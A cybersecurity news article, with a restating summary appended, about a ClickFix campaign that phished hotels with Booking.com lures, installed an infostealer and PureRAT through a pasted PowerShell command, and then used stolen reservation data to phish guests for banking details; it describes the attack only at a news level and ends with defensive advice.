ClickFix Scam Targets Hotels, Spurs Customer Attacks TechTarget and Informa Tech’s Digital Business Combine.TechTarget and InformaTechTarget and Informa Tech’s Digital Business Combine.Together, we power an unparalleled network of 220+ online properties covering 10,000+ granular topics, serving an audience of 50+ million professionals with original, objective content from trusted sources. We help you gain critical insights and make more informed decisions across your business priorities.Dark Reading Resource LibraryBlack Hat NewsOmdia CybersecurityAdvertiseNewsletter Sign-UpNewsletter Sign-UpCybersecurity TopicsRelated TopicsApplication SecurityCybersecurity CareersCloud SecurityCyber RiskCyberattacks & Data BreachesCybersecurity AnalyticsCybersecurity OperationsData PrivacyEndpoint SecurityICS/OT SecurityIdentity & Access Mgmt SecurityInsider ThreatsIoTMobile SecurityPerimeterPhysical SecurityRemote WorkforceThreat IntelligenceVulnerabilities & ThreatsRecent in Cybersecurity TopicsApplication Security'Ransomvibing' Infests Visual Studio Extension Market'Ransomvibing' Infests Visual Studio Extension MarketbyAlexander CulafiNov 7, 20254 Min ReadCybersecurity OperationsAI Security Agents Get Persona MakeoversAI Security Agents Get Persona MakeoversbyRobert Lemos, Contributing WriterNov 7, 20255 Min ReadWorld Related TopicsDR GlobalMiddle East & AfricaAsia PacificRecent in World See AllThreat IntelligenceSilver Fox APT Blurs the Line Between Espionage & CybercrimeSilver Fox APT Blurs the Line Between Espionage & CybercrimebyNate Nelson, Contributing WriterAug 8, 20253 Min ReadThreat IntelligenceIran-Israel War Triggers a Maelstrom in CyberspaceIran-Israel War Triggers a Maelstrom in CyberspacebyNate Nelson, Contributing WriterJun 19, 20255 Min ReadThe EdgeDR TechnologyEventsRelated TopicsUpcoming EventsPodcastsWebinarsSEE ALLResourcesRelated TopicsResource LibraryNewslettersPodcastsReportsVideosWebinarsWhite Papers Partner PerspectivesDark Reading Resource LibraryCyberattacks & Data BreachesThreat IntelligenceRemote WorkforceEndpoint SecurityNewsClickFix Campaign Targets Hotels, Spurs Secondary Customer AttacksAttackers compromise hospitality providers with an infostealer and RAT malware and then use stolen data to launch phishing attacks against customers via both email and WhatsApp.Elizabeth Montalbano, Contributing WriterNovember 10, 20254 Min ReadSource: Aleksey Zotov via. Alamy Stock PhotoResearchers have uncovered a broad campaign in which threat actors target hotels with ClickFix attacks to steal customer data as part of ongoing attacks against the hospitality sector that includes secondary attacks against the establishments' customers.Threat analysts at Sekoia.io uncovered the activity when a partner alerted them to a phishing campaign that used either emails sent from a hotel's compromised Booking.com account or messages in WhatsApp, according to a report published Friday. Attackers had customer data, including personal identifiers and reservation details, which made their phishing attempts appear more legitimate.After further analysis, the researchers realized the activity was part of a much broader campaign that started around April and was still active up to at least October involving a ClickFix attack spreading infostealing malware that targeted hotels and other lodging establishments, they said. The campaign enabled the theft of professional credentials granting access to booking platforms, such as Booking.com and Expedia."Threat actors then either sold the harvested credentials on cybercrime forums or leveraged them directly to send fraudulent emails to hotel customers, often as part of banking fraud schemes," Jeremy Scion, Quentin Bourgue, and Sekoia Threat Detection Response (TDR) wrote in the report. Moreover, they uncovered "hundreds of malicious domains active for several months as of October 2025, demonstrating a resilient and likely profitable campaign," according to the report.Related:SonicWall Firewall Backups Stolen by Nation-State ActorTargeting Hospitality SectorThe initial attack against hotels uses a compromised email account to send malicious messages to multiple hotel establishments. In some instances, attackers alter the "From" header to impersonate Booking.com, while subject lines are often related to guest matters, including references to last-minute booking, listings, reservations, and the like.The attack chain then uses a redirection URL that ultimately leads to a ClickFix reCAPTACHA challenge in which users are prompted to copy a malicious PowerShell command. This command eventually leads to the deployment of infostealing and remote access Trojan (RAT) malware.Sequoia.io cited March research from Microsoft that detailed attackers impersonating Booking.com in ClickFix attacks against hotels, noting that the campaigns are similar.Cofense last June also detailed a ClickFix campaign targeting hotels that used lures regarding guests similar to the one Sekoia.io outlined. Cofense's report noted the attacks delivered various infostealing and RAT malware as well, demonstrating consistent attack activity against the hospitality sector using ClickFix.Related:Nikkei Suffers Breach Via Slack CompromiseClickFix Multi-Malware DeliveryClickFix is an attack method first detailed by researchers at Proofpoint last year in which a compromised website shows users fake error messages by executing malicious code, tricking them into thinking they have to download or update software to address the issue. In reality, however, installing the "update" actually executes malware on their devices. Since its discovery, the vector has gained steady traction with threat actors.In this campaign, the attack delivers infostealing malware that gathers various data from the compromised system, including key system information, and downloads files that lead to the launch of a RAT known as "PureRAT" for further malicious activity. The infostealer also reports status updates to its command-and-control (C2) infrastructure at each step of the attack to indicate the successful progression of the action, the researchers noted.PureRAT is a modular malware-as-a-service (Maas) also known as PureHVNC and ResolverRAT. Once deployed, PureRAT capabilities include remote user interface access, mouse and keyboard control, webcam and microphone capture, keylogging, file upload/download, traffic proxying, data exfiltration, and remote execution of commands or binaries, according to the Sekoia.io report.Related:Iran's Elusive "SmudgedSerpent' APT Phishes Influential US Policy WonksDownstream Customer AttacksThe ClickFix attacks against hotels have led to secondary attacks against their customers, with attackers contacting them via WhatsApp or email using legitimate reservation details of the target, according to the researchers. "The message claimed an alleged security issue had occurred during the verification of the customer’s banking details and urged them to confirm their information," they wrote. "To strengthen the credibility of the message, the attacker explained that this was a procedure implemented by Booking to protect against cancellations."Attackers then ask victims to validate banking details by visiting a URL, which led to the phishing page that mimics Booking.com’s typography and layout and which harvests the victim’s banking information. Avoiding ClickFix ScamsThe campaign is further evidence of the growing effectiveness of threat actors in various aspects of malicious activities, including social engineering in their targeting of Booking.com and hospitality sites, as well as use of related lures and commodity malware on cybercrime forums.To help defenders avoid compromise, Sekoia.io included a list of indicators of compromise (IoCs) in the post, including those associated with the Clickfix redirect URL, PowerShell URL, and payload; PureRAT staging and payload; and URLs involved in the phishing campaign against hotel customers.As always, people should be suspicious of receiving unsolicited emails related to services they frequently use, and analyze them carefully, even if they appear to come from a credible sender or service provider.About the AuthorElizabeth Montalbano, Contributing WriterElizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.See more from Elizabeth Montalbano, Contributing WriterMore InsightsIndustry Reports2025 DigiCert DDoS Biannual ReportDigiCert RADAR - Risk Analysis, Detection & Attack ReconnaissanceThe Total Economic Impact of DigiCert ONEIDC MarketScape: Worldwide Exposure Management 2025 Vendor AssessmentThe Forrester Wave™: Unified Vulnerability Management Solutions, Q3 2025Access More ResearchWebinarsHow AI & Autonomous Patching Eliminate Exposure RisksThe Cloud is No Longer Enough: Securing the Modern Digital PerimeterSecuring the Hybrid Workforce: Challenges and SolutionsCybersecurity Outlook 2026Threat Hunting Tools & Techniques for Staying Ahead of Cyber AdversariesMore WebinarsYou May Also LikeEditor's ChoiceCybersecurity OperationsElectronic Warfare Puts Commercial GPS Users on NoticeElectronic Warfare Puts Commercial GPS Users on NoticebyRobert Lemos, Contributing WriterOct 21, 20254 Min ReadKeep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.SubscribeNov 13, 2025During this event, we'll examine the most prolific threat actors in cybercrime and cyber espionage, and how they target and infiltrate their victims.Secure Your SeatWebinarsHow AI & Autonomous Patching Eliminate Exposure RisksOn-DemandThe Cloud is No Longer Enough: Securing the Modern Digital PerimeterTues, Nov 18, 2025 at 1pm ESTSecuring the Hybrid Workforce: Challenges and SolutionsTues, Nov 4, 2025 at 1pm ESTCybersecurity Outlook 2026Virtual Event | December 3rd, 2025 | 11:00am - 5:20pm ET | Doors Open at 10:30am ETThreat Hunting Tools & Techniques for Staying Ahead of Cyber AdversariesTuesday, Oct 21, 2025 at 1pm ESTMore WebinarsWhite PapersPKI Modernization WhitepaperEDR v XDR v MDR- The Cybersecurity ABCs ExplainedHow to Chart a Path to Exposure Management MaturitySecurity Leaders' Guide to Exposure Management StrategyThe NHI Buyers GuideExplore More White PapersDiscover MoreBlack HatOmdiaWorking With UsAbout UsAdvertiseReprintsJoin UsNewsletter Sign-UpFollow UsCopyright © 2025 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. TechTarget, Inc.’s registered office is 275 Grove St. Newton, MA 02466.Home|Cookie Policy|Privacy|Terms of Use

The ClickFix attack, initially detailed by researchers at Proofpoint, has evolved into a persistently effective tactic targeting hotels and subsequently, their customers. Sekoia.io, in collaboration with a partner, uncovered a broad campaign originating around April 2025 and continuing through at least October 2025, centered on leveraging a compromised website to induce users into executing malicious code disguised as software updates. This “ClickFix” method relies on presenting users with fake error messages and prompting them to download and install malware. This malware, in this case, delivered both an infostealing program and a Remote Access Trojan (RAT) known as “PureRAT”.

The initial stage of the attack involves a compromised email account sending malicious messages to hotel establishments. These messages, often mimicking Booking.com communications regarding last-minute bookings, reservations, and similar guest-related issues, lead users to a ClickFix reCAPTCHA challenge. Successfully navigating this challenge prompts the execution of a PowerShell command, ultimately deploying the infostealing malware. This malware gathers system information, downloads files leading to the deployment of PureRAT, and regularly reports its progress to the attacker’s command-and-control (C2) infrastructure. PureRAT itself is a modular “malware-as-a-service” (Maas) platform – also known as PureHVNC or ResolverRAT – offering capabilities such as remote user interface access, keyboard and mouse control, webcam and microphone capture, keylogging, file upload/download, traffic proxying, data exfiltration, and the execution of further commands.

The implications of this campaign extend beyond simply compromising hotel systems. Sekoia.io’s investigation revealed a secondary attack vector: targeting the customers of these hotels. Attackers utilized stolen reservation details—obtained through the initial hotel compromises—to launch phishing campaigns via WhatsApp or email. These messages, ostensibly from Booking.com, falsely claimed an alleged security issue during banking verification processes and urged victims to validate their banking information. This deception often led victims to a phishing page mirroring Booking.com’s design, harvesting their sensitive financial data.

Researchers identified hundreds of malicious domains active for several months, demonstrating the resilience and profitability of this ongoing campaign. The success of this tactic is indicative of a broader trend: the increasingly sophisticated use of social engineering techniques, the deployment of commodity malware via cybercrime forums, and the ability of threat actors to exploit vulnerabilities in established online booking platforms like Booking.com. Sekoia.io provided a suite of Indicators of Compromise (IoCs) to aid in detection and mitigation, including URLs associated with the ClickFix redirect, PowerShell commands, and payload files, as well as URLs involved in the phishing campaign against hotel customers. This highlights the importance of vigilance and active threat monitoring in the face of rapidly evolving cyber threats. The campaign underscores the need for organizations, particularly those in the hospitality sector, to implement robust security measures, including employee training, multi-factor authentication, and continuous monitoring to prevent and detect such attacks.